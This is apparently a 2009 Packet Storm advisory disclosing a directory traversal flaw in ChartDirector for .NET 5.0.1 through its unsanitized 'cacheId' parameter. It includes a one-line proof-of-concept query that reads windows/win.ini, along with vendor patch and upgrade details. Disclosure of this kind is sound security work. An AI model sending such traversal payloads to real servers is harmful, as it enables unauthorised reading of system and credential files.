ChartDirectory Directory Traversal

2009-09-10T00:00:00
ID PACKETSTORM:81127
Type packetstorm
Reporter DokFLeed
Modified 2009-09-10T00:00:00

Description

                                        
                                            `Hi,  
Please find the following Advisory  
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=37  
Regards  
DokFLeed  
====================================================  
Advisory No.: ISNSC-0910  
=============  
ChartDirector Critical File Access  
  
Information  
======  
Author: DokFLeed  
Program Affected: http://www.chartdir.com for .NET  
Version: 5.0.1  
Severity: Critical.  
Type of Advisory: Mid Disclosure.  
Affected/Tested Versions: Random  
  
Program Description  
==================  
Widely used Chart Component on Financial & Stock Trading websites  
  
Overview  
=========  
The query variable "cacheId=" is not sanitized, it will can allow critical   
files download  
  
Proof Of Concept  
================  
?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini  
  
Solution/Fix  
============  
Upgrade to latest Chart Dir or apply the following patch (ChartDirector for   
.NET Ver 5.0.1 Patch 2):  
http://www.advsofteng.com/netchartdir501p2.zip  
  
Vendor Status  
============  
The problem you mentions affect ChartDirector for .NET.  
The current version of ChartDirector for .NET on our web site (Ver 5.0.2)   
already has this issue fixed. So this issue no longer occurs with the   
current version of ChartDirector for .NET.  
For people using earlier versions of ChartDirector, it is suggested they   
upgrade to the latest version. They may also apply the following patch   
(ChartDirector for .NET Ver 5.0.1 Patch 2):  
http://www.advsofteng.com/netchartdir501p2.zip  
  
Reference  
============  
http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48   
`